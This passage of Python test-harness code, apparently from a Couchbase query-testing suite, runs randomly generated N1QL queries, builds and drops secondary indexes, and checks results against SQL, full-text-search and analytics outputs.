self._check_and_push_failure_record_queue(result_run, test_data, failure_record_queue)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _test_result_analysis(self, queue):
result_list = []
pass_case = 0
fail_case = 0
failure_map = {}
keyword_map = {}
failure_reason_map = {}
success = True
while not queue.empty():
result_list.append(queue.get())
total = len(result_list)
for result_run in result_list:
test_case_number = result_run["test_case_number"]
sql_query = result_run["sql_query"]
n1ql_query = result_run["n1ql_query"]
check, message, failure_types = self._analyze_result(result_run)
success = success and check
if check:
pass_case += 1
else:
fail_case += 1
for failure_reason_type in failure_types:
if failure_reason_type not in list(failure_reason_map.keys()):
failure_reason_map[failure_reason_type] = 1
else:
failure_reason_map[failure_reason_type] += 1
keyword_list = self.query_helper.find_matching_keywords(n1ql_query, self.keyword_list)
for keyword in keyword_list:
if keyword not in list(keyword_map.keys()):
keyword_map[keyword] = 1
else:
keyword_map[keyword] += 1
failure_map[test_case_number] = {"sql_query": sql_query, "n1ql_query": n1ql_query,
"run_result": message, "keyword_list": keyword_list}
pass_percent = 0
if total > 0:
summary = " Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total))
else:
summary = " No Query Results Found"
if len(keyword_map) > 0:
summary += "\n [ KEYWORD FAILURE DISTRIBUTION ] \n"
for keyword in list(keyword_map.keys()):
summary += keyword+" :: " + str((keyword_map[keyword]*100)/total)+"%\n "
if len(failure_reason_map) > 0:
summary += "\n [ FAILURE TYPE DISTRIBUTION ] \n"
for keyword in list(failure_reason_map.keys()):
summary += keyword+" :: " + str((failure_reason_map[keyword]*100)/total)+"%\n "
self.log.info(" Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total)))
result = self._generate_result(failure_map)
return success, summary, result
def _gen_expected_result(self, sql="", test=49):
sql_result = []
try:
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if test == 51:
columns = []
rows = []
else:
columns, rows = client._execute_query(query=sql)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
if ex.message.__contains__("SQL syntax") or ex.message.__contains__("ERROR"):
print("Error in sql syntax")
return sql_result
def _check_explain_plan_for_secondary_index(self, n1ql_query=None):
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
actual_result = self.n1ql_helper.run_cbq_query(query="EXPLAIN "+n1ql_query, server=self.n1ql_server)
self.log.info("EXPLAIN PLAN :: "+str(actual_result))
if "PrimaryScan" in str(actual_result['results'][0]['plan']):
return {"success": False, "result": "Fail"}
else:
return {"success": True, "result": "Pass"}
def _run_queries_and_verify(self, aggregate=False, subquery=False, n1ql_query=None, sql_query=None, expected_result=None):
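        # Core verification step: roughly 20% of runs are wrapped in PREPARE/EXECUTE,
        # bucket references are rewritten for default collections or query_context,
        # and, depending on the run, an FTS or analytics variant of the query is
        # built. The N1QL result is then compared against the SQL / FTS / analytics
        # result, first by row count and then via _verify_results_rqg.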
query_context = ""
skip = False
use_prepared = False
fts_explain_query = ""
chance_of_prepared = random.randint(1, 100)
if chance_of_prepared <= 20:
use_prepared = True
self.log.info("Preparing query {0}".format(n1ql_query))
if not self.create_primary_index:
n1ql_query = n1ql_query.replace("USE INDEX(`#primary` USING GSI)", " ")
if self.prepared or use_prepared:
n1ql_query = "PREPARE " + n1ql_query
self.log.info("Prepared query {0}".format(n1ql_query))
if self.use_default_collection:
n1ql_query = n1ql_query.replace("table_10", "table_010")
for bucket in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(bucket, bucket+"._default._default")
n1ql_query = n1ql_query.replace("table_010", "table_10._default._default")
if self.use_query_context:
n1ql_query = n1ql_query.replace("table_10", "table_010")
# So that query context works for multiple buckets, replace the first matching bucket and leave the rest as full paths
for bucket in self.advise_dict.keys():
if bucket in n1ql_query and not skip:
n1ql_query = n1ql_query.replace(bucket, "_default")
query_context = "default:"+bucket+"._default"
skip = True
else:
n1ql_query = n1ql_query.replace(bucket, bucket + "._default._default")
n1ql_query = n1ql_query.replace("table_010", "table_10._default._default")
fts_query = n1ql_query
cbas_query = n1ql_query
if self.use_fts:
if not "JOIN" in n1ql_query:
add_hint = n1ql_query.split("WHERE")
fts_query = add_hint[0] + " USE INDEX (USING FTS, USING GSI) WHERE " + add_hint[1]
if "BETWEEN" in n1ql_query:
fts_query = add_hint[0] + " USE INDEX (USING FTS) WHERE " + add_hint[1]
else:
split_list = n1ql_query.split("JOIN")
i = 0
new_n1ql = ""
for items in split_list:
if "ON" in items:
items = items.replace("ON", "USE INDEX (USING FTS) ON")
else:
items = items.replace("INNER", "USE INDEX (USING FTS) INNER")
items = items.replace("LEFT", "USE INDEX (USING FTS) LEFT")
if i == 0:
new_n1ql = new_n1ql + items
else:
new_n1ql = new_n1ql + " JOIN " + items
i = i + 1
fts_query = new_n1ql
fts_explain_query = fts_query
self.log.info(" FTS QUERY :: {0}".format(fts_query))
elif self.use_analytics:
cbas_query = cbas_query.replace("ANY ", "(ANY ")
cbas_query = cbas_query.replace("EVERY ", "(EVERY ")
cbas_query = cbas_query.replace("SOME ", "(SOME ")
cbas_query = cbas_query.replace("END", "END)")
cbas_query = cbas_query.replace("type", "`type`")
else:
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
# Run n1ql query
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
if subquery:
query_params = {'timeout': '1200s'}
else:
query_params={}
if self.use_fts:
fts_result = self.n1ql_query_runner_wrapper(n1ql_query=fts_query, server=self.n1ql_server,
query_params=query_params,query_context=query_context)
if self.use_query_context:
if "PREPARE" in fts_query:
fts_explain_query = fts_query.replace("PREPARE","")
fts_explain = self.n1ql_helper.run_cbq_query(query="EXPLAIN " + fts_explain_query, server=self.n1ql_server,
query_params=query_params,query_context=query_context,use_sdk=self.use_sdk)
else:
if "PREPARE" in fts_query:
fts_explain_query = fts_query.replace("PREPARE","")
fts_explain = self.n1ql_helper.run_cbq_query(query="EXPLAIN " + fts_explain_query, server=self.n1ql_server,query_params=query_params,use_sdk=self.use_sdk)
if not (fts_explain['results'][0]['plan']['~children'][0]['#operator'] == 'IndexFtsSearch' or fts_explain['results'][0]['plan']['~children'][0]['~children'][0]['#operator'] == 'IndexFtsSearch'):
return {"success": False, "result": str("Query does not use fts index {0}".format(fts_explain))}
elif self.use_analytics:
analytics_result = self.n1ql_query_runner_wrapper(n1ql_query=cbas_query, server=self.n1ql_server,
query_params=query_params,query_context=query_context)
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus",query_context=query_context)
if self.prepared or use_prepared:
name = actual_result["results"][0]['name']
prepared_query = "EXECUTE '%s'" % name
self.log.info(" N1QL QUERY :: {0}".format(prepared_query))
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus",query_context=query_context)
if self.use_fts:
fts_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus",query_context=query_context)
n1ql_result = actual_result["results"]
if self.use_fts:
fts_result = fts_result["results"]
elif self.use_analytics:
analytics_result = analytics_result['results']
# Run SQL Query
if not self.use_fts and not self.use_analytics:
sql_result = expected_result
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
elif self.use_fts:
self.log.info(" result from fts query returns {0} items".format(len(fts_result)))
elif self.use_analytics:
self.log.info(" result from analytics query returns {0} items".format(len(analytics_result)))
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
if self.use_fts:
if len(n1ql_result) != len(fts_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("fts query is {0}".format(fts_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(fts_result) == 0 and len(n1ql_result) == 1) or (
len(n1ql_result) == 0 and len(fts_result) == 1) or (len(fts_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
elif self.use_analytics:
if len(n1ql_result) != len(analytics_result):
self.log.info("number of results returned from analytics and n1ql are different")
self.log.info("analytics query is {0}".format(cbas_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(analytics_result) == 0 and len(n1ql_result) == 1) or (
len(n1ql_result) == 0 and len(analytics_result) == 1) or (len(analytics_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
else:
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
if self.use_fts:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=fts_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown,use_fts=self.use_fts)
elif self.use_analytics:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=analytics_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
else:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=sql_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex) }
return {"success": True, "result": "Pass"}
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
def _run_queries_and_verify_crud(self, n1ql_query=None, sql_query=None, expected_result=None, table_name=None):
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
if n1ql_query.find(self.database) <= 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
try:
self.n1ql_helper._verify_results_crud_rqg(sql_result=sql_result, n1ql_result=n1ql_result, hints=hints)
except Exception as ex:
self.log.info(ex)
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception as ex:
return {"success": False, "result": str(ex)}
def _run_queries_with_explain(self, n1ql_query=None, indexes={}):
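        # For each index hint, runs EXPLAIN on the hinted query and checks that the
        # expected index shows up in the plan (optionally verifying covering).
        # Queries containing NOT, or whose GROUP BY / ORDER BY fields are not
        # covered, are recorded as passing without running the EXPLAIN check.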
run_result = {}
# Run n1ql query
for index_name in indexes:
hint = "USE INDEX({0} USING {1})".format(index_name, indexes[index_name]["type"])
n1ql = self.query_helper._add_explain_with_hints(n1ql_query, hint)
self.log.info(n1ql)
message = "Pass"
check = True
fieldsnotcovered = False
if self.check_covering_index:
query = "select * from system:indexes where name = '%s'" % index_name
actual_result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
n1ql_result = actual_result["results"]
fields = n1ql_result[0]["indexes"]["index_key"]
fieldsnotcovered = self.query_helper.check_groupby_orderby(n1ql_query, fields)
if "NOT" in n1ql or "not" in n1ql or fieldsnotcovered and self.check_covering_index:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
else:
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_index_with_explain(actual_result, index_name,
self.check_covering_index)
if not check:
message = " query {0} failed explain result, index {1} not found".format(n1ql_query, index_name)
self.log.info(message)
except Exception as ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
return run_result
def _run_explain_queries(self, n1ql_query=None, keyword ="", present=True):
run_result = {}
# Run n1ql query
n1ql = self.query_helper._add_explain_with_hints(n1ql_query)
self.log.info("Running query: " + n1ql)
message = "Pass"
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_explain(actual_result, keyword, present)
if not check:
if present:
message = " query {0} failed explain result, keyword {1} not found".format(n1ql_query, keyword)
else:
message = " query {0} failed explain result, keyword {1} was found but should not be present".format(n1ql_query, keyword)
self.log.info(message)
except Exception as ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for query: {0}".format(n1ql)
run_result[key] = {"success": check, "result": message}
return run_result
def _initialize_cluster_setup(self):
if self.use_mysql:
self.log.info(" Will load directly from mysql")
self._initialize_mysql_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
elif self.use_postgres:
self._initialize_postgres_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
else:
self.log.info(" Will load directly from file snap-shot")
if self.populate_with_replay:
self._initialize_mysql_client()
self._setup_and_load_buckets_from_files()
self.n1ql_helper = self._initialize_n1ql_helper()
# create copy of simple table if this is a merge operation
self.sleep(10)
if self.gsi_type == "memory_optimized":
os.system("curl -X POST http://Administrator:password@{1}:8091/pools/default -d memoryQuota={0} -d indexMemoryQuota={2}".format(self.ram_quota, self.n1ql_server.ip, self.indexer_memQuota))
self.sleep(10)
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 15")
self._build_indexes()
def _build_indexes(self):
self.sec_index_map = {}
fields = ['primary_key_id', 'bool_field1', 'char_field1', 'datetime_field1', 'decimal_field1',
'int_field1', 'varchar_field1']
if self.create_secondary_indexes:
if self.use_mysql or self.use_postgres:
self.sec_index_map = self.client._gen_index_combinations_for_tables(partitioned_indexes=self.partitioned_indexes)
else:
self.sec_index_map = self._extract_secondary_index_map_from_file(self.secondary_index_info_path)
if not self.generate_input_only:
if self.create_primary_index:
self._build_primary_indexes(self.using_gsi)
if self.create_secondary_meta_indexes:
index_name = ""
for table_name in list(self.sec_index_map.keys()):
queries = {}
index_name = table_name
query = "CREATE INDEX {0} ON {1}(primary_key_id,bool_field1,char_field1," \
"datetime_field1," \
"decimal_field1,int_field1,varchar_field1)".format(table_name, self.database + "_" + table_name)
queries[index_name] = query
if self.create_secondary_ansi_join_indexes:
for field in fields:
index_name = table_name+"_"+field
query = "CREATE INDEX {0} ON {1}({2})".format(table_name+"_"+field, self.database+"_"+table_name, field)
queries[index_name] = query
for index_name in list(queries.keys()):
try:
self.n1ql_helper.run_cbq_query(query=queries[index_name],
server=self.n1ql_server, verbose=False)
check = self.n1ql_helper.is_index_online_and_in_list(self.database+"_"+table_name,
index_name ,
server=self.n1ql_server,
timeout=240)
except Exception as ex:
self.log.info(ex)
if self.create_secondary_indexes and (not self.create_secondary_meta_indexes):
thread_list = []
if self.build_secondary_index_in_seq:
for table_name in list(self.sec_index_map.keys()):
self._gen_secondary_indexes_per_table(self.database+"_"+table_name, self.sec_index_map[table_name], 0)
else:
for table_name in list(self.sec_index_map.keys()):
t = threading.Thread(target=self._gen_secondary_indexes_per_table, args=(self.database+"_"+table_name, self.sec_index_map[table_name]))
t.daemon = True
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def _build_primary_indexes(self, using_gsi=True):
if self.create_primary_index:
if not self.partitioned_indexes:
self.n1ql_helper.create_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
else:
self.n1ql_helper.create_partitioned_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
def _load_bulk_data_in_buckets_using_n1ql(self, bucket, data_set):
try:
n1ql_query = self.query_helper._builk_insert_statement_n1ql(bucket.name, data_set)
if not self.use_rest:
new_query_helper = N1QLHelper(version="sherlock", shell=self.shell, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None, n1ql_port=getattr(self.n1ql_server, 'n1ql_port', 8093),
full_docs_list=[], log=self.log, input=self.input, master=self.master,
database=self.database, use_rest=True)
new_query_helper.run_cbq_query(query=n1ql_query, server=self.n1ql_server, verbose=False)
else:
self.n1ql_helper.run_cbq_query(query=n1ql_query, server=self.n1ql_server, verbose=False)
except Exception as ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _load_data_in_buckets_using_mc_bin_client_json(self, bucket, data_set):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
try:
for key in list(data_set.keys()):
client.set(key.encode("utf8"), 0, 0, json.dumps(data_set[key]))
except Exception as ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _initialize_rqg_query_helper(self):
return RQGQueryHelper()
def _initialize_n1ql_helper(self):
use_engine = random.randint(1, 100)
if use_engine <= 20 and not self.use_analytics:
self.use_sdk = True
elif use_engine <= 40 and not self.use_analytics:
self.use_rest = False
self.log.info("We are using the CBQ engine to run queries for this run")
return N1QLHelper(version="sherlock", shell=self.shell, max_verify=self.max_verify,
                           buckets=self.buckets, item_flag=None, n1ql_port=getattr(self.n1ql_server, 'n1ql_port', 8093),
full_docs_list=[], log=self.log, input=self.input, master=self.master,
database=self.database, use_rest=self.use_rest)
def _initialize_mysql_client(self):
if self.reset_database:
self.client = RQGMySQLClient(host=self.mysql_url, user_id=self.user_id, password=self.password)
if self.subquery:
path = "b/resources/rqg/{0}/database_definition/definition-subquery.sql".format(self.database)
else:
path = "b/resources/rqg/{0}/database_definition/definition.sql".format(self.database)
self.database = self.database+"_"+str(self.query_helper._random_int())
populate_data = False
if not self.populate_with_replay:
populate_data = True
if self.subquery:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=1)
else:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=self.number_of_buckets)
self._copy_table_for_merge()
else:
self.client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _initialize_postgres_client(self):
self.client = RQGPostgresClient()
self.client.reset_database_add_data()
def _copy_table_for_merge(self):
table_list = self.client._get_table_list()
reference_table = table_list[0]
if self.merge_operation:
path = "b/resources/rqg/crud_db/database_definition/table_definition.sql"
self.client.database_add_data(database=self.database, sql_file_definiton_path=path)
table_list = self.client._get_table_list()
for table_name in table_list:
if table_name != reference_table:
sql = "INSERT INTO {0} SELECT * FROM {1}".format(table_name, reference_table)
self.client._insert_execute_query(sql)
table_list = self.client._get_table_list()
for table_name in table_list:
self.client_map[table_name] = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _generate_result(self, data):
result = ""
for key in list(data.keys()):
result +="<<<<<<<<<< TEST {0} >>>>>>>>>>> \n".format(key)
for result_key in list(data[key].keys()):
result += "{0} :: {1} \n".format(result_key, data[key][result_key])
return result
def _gen_secondary_indexes_per_table(self, table_name="", index_map={}, sleep_time=2):
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
else:
defer_mode = str({"defer_build": "true"})
build_index_list = []
batch_index_definitions = index_map
if self.pushdown:
table_field_map = self.client._get_field_list_map_for_tables()
fields = table_field_map['simple_table']
combination_fields = sum([list(map(list, combinations(fields, i))) for i in range(len(fields) + 1)], [])
for x in range(1, len(combination_fields)):
input = combination_fields[x]
if len(input) == 1:
fields_indexed = str(input[0])
index_name = "ix_" + str(0) + str(x)
else:
fields_indexed = str(input[0])
#TODO: this code is really weird!
for i in range(1, len(input)):
index_name = "ix_" + str(i) + str(x)
fields_indexed = fields_indexed+"," + str(x[i])
if self.partitioned_indexes:
query = "CREATE INDEX {0} ON {1}({2}) PARTITION BY HASH(meta().id)".format(
index_name, table_name, fields_indexed)
else:
query = "CREATE INDEX {0} ON {1}({2})".format(index_name,
table_name,
fields_indexed)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
self.n1ql_helper.is_index_online_and_in_list(table_name, index_name, server=self.n1ql_server, timeout=240)
except Exception as ex:
self.log.info(ex)
if self.dynamic_indexing:
index_name = "idx_" + table_name
query = "CREATE INDEX {0} ON {1}(DISTINCT ARRAY v FOR v IN PAIRS(SELF) END) WITH {2}".format(index_name, table_name, defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception as ex:
self.log.info(ex)
raise
else:
for index_name in list(batch_index_definitions.keys()):
query = "{0} WITH {1}".format(
batch_index_definitions[index_name]["definition"],
defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
batch_size = 0
end_index_batch = 0
total_indexes = 0
while total_indexes < len(build_index_list):
start_index_batch = end_index_batch
end_index_batch = min(end_index_batch+self.build_index_batch_size, len(build_index_list))
batch_size += 1
if start_index_batch == end_index_batch:
break
list_build_index_list = build_index_list[start_index_batch:end_index_batch]
total_indexes += len(list_build_index_list)
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(table_name, ",".join(list_build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
self.sleep(15, "sleep after building index")
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
raise
self.sleep(sleep_time)
def _extract_secondary_index_map_from_file(self, file_path="/tmp/index.txt"):
with open(file_path) as data_file:
return json.load(data_file)
def _generate_secondary_indexes_in_batches(self, batches):
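        # Creates all indexes needed by a batch of test cases with deferred builds,
        # issues a single BUILD INDEX statement for them, and then waits via
        # async_monitor_index tasks until every index is online.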
if self.generate_input_only:
return
defer_mode = str({"defer_build": "true"})
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
batch_index_definitions = {}
build_index_list = []
# add indexes to batch_index_definitions
for info in batches:
table_name = info["bucket"]
batch_index_definitions.update(info["indexes"])
for index_name in list(batch_index_definitions.keys()):
query = "{0} WITH {1}".format(batch_index_definitions[index_name]["definition"], defer_mode)
query = query.replace("ON simple_table", "ON "+self.database+"_"+"simple_table")
if self.aggregate_pushdown:
query = query.replace("limit 10 offset 4", "")
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
if index_name not in build_index_list:
build_index_list.append(index_name)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(self.database+"_"+table_name, ",".join(build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
raise
# Monitor till the index is built
tasks = []
try:
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"]:
if index_name in build_index_list:
tasks.append(self.async_monitor_index(bucket=table_name, index_name=index_name))
for task in tasks:
task.result()
except Exception as ex:
traceback.print_exc()
self.log.info(ex)
def async_monitor_index(self, bucket, index_name=None):
monitor_index_task = self.cluster.async_monitor_index(server=self.n1ql_server, bucket=bucket,
n1ql_helper=self.n1ql_helper, index_name=index_name)
return monitor_index_task
def are_any_indexes_present(self, index_name_list):
query_response = self.n1ql_helper.run_cbq_query("SELECT * FROM system:indexes")
current_indexes = [i['indexes']['name'] for i in query_response['results']]
for index_name in index_name_list:
if index_name in current_indexes:
return True
return False
def wait_for_index_drop(self, index_name_list):
self.with_retry(lambda: self.are_any_indexes_present(index_name_list), eval=False, delay=1, tries=30)
def with_retry(self, func, eval=True, delay=5, tries=10):
attempts = 0
while attempts < tries:
attempts = attempts + 1
res = func()
if res == eval:
return res
else:
self.sleep(delay, 'incorrect results, sleeping for %s' % delay)
raise Exception('timeout, invalid results: %s' % res)
def _drop_secondary_indexes_in_batches(self, batches):
dropped_indexes = []
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in list(info["indexes"].keys()):
if index_name not in dropped_indexes:
query = "DROP INDEX {0}.{1} USING {2}".format(table_name, index_name,
info["indexes"][index_name]["type"])
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server,
query_params={'timeout': '900s'})
dropped_indexes.append(index_name)
except Exception as ex:
self.log.info("Error: " + str(ex))
self.wait_for_index_drop(list(info["indexes"].keys()))
def _analyze_result(self, result):
check = True
failure_types = []
message = "\n ____________________________________________________\n "
for key in list(result.keys()):
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and key!="check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: " + str(result[key]["result"]) + "\n"
if key == "check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: Secondary index is not in use\n"
return check, message, failure_types
def _check_and_push_failure_record_queue(self, result, data, failure_record_queue):
if not self.record_failure:
return
for key in list(result.keys()):
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and not result[key]["success"]:
failure_record_queue.put(data)
def dump_failure_data(self, failure_record_queue):
if not self.record_failure:
return
import uuid
sub_dir = str(uuid.uuid4()).replace("-", "")
self.data_dump_path = self.failure_record_path+"/"+sub_dir
os.mkdir(self.data_dump_path)
input_file_path = self.data_dump_path+"/input"
os.mkdir(input_file_path)
f_write_file = open(input_file_path+"/source_input_rqg_run.txt", 'w')
secondary_index_path = self.data_dump_path+"/index"
os.mkdir(secondary_index_path)
database_dump = self.data_dump_path+"/db_dump"
os.mkdir(database_dump)
f_write_index_file = open(secondary_index_path+"/secondary_index_definitions.txt", 'w')
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
client.dump_database(data_dump_path=database_dump)
client._close_connection()
f_write_index_file.write(json.dumps(self.sec_index_map))
f_write_index_file.close()
while not failure_record_queue.empty():
f_write_file.write(json.dumps(failure_record_queue.get())+"\n")
f_write_file.close()
def unzip_template(self, template_path):
if "zip" not in template_path:
return template_path
tokens = template_path.split("/")
file_name = tokens[len(tokens)-1]
output_path = template_path.replace(file_name, "")
with zipfile.ZipFile(template_path, "r") as z:
z.extractall(output_path)
template_path = template_path.replace(".zip", "")
return template_path
def _setup_and_load_buckets_from_files(self):
bucket_list = []
#Unzip the files and get bucket list
tokens = self.db_dump_path.split("/")
data_file_path = self.db_dump_path.replace(tokens[len(tokens)-1], "data_dump")
os.mkdir(data_file_path)
with zipfile.ZipFile(self.db_dump_path, "r") as z:
z.extractall(data_file_path)
onlyfiles = [f for f in listdir(data_file_path) if isfile(join(data_file_path, f))]
for file in onlyfiles:
bucket_list.append(file.split(".")[0])
# Remove any previous buckets
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
# Create New Buckets
self._create_buckets(self.master, bucket_list, server_id=None, bucket_size=None)
# Wait till the buckets are up
self.sleep(15)
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
for bucket in self.buckets:
if bucket.name == bucket_name:
file_path = data_file_path+"/"+bucket_name+".txt"
with open(file_path) as data_file:
data = json.load(data_file)
self._load_data_in_buckets_using_mc_bin_client_json(bucket, data)
if self.populate_with_replay:
for key in list(data.keys()):
insert_sql = self.query_helper._generate_insert_statement_from_data(bucket_name, data[key])
self.client._insert_execute_query(insert_sql)
shutil.rmtree(data_file_path, ignore_errors=True)
def fill_advise_dict(self, bucket_list=[]):
for bucket in bucket_list:
if bucket not in self.advise_dict.keys():
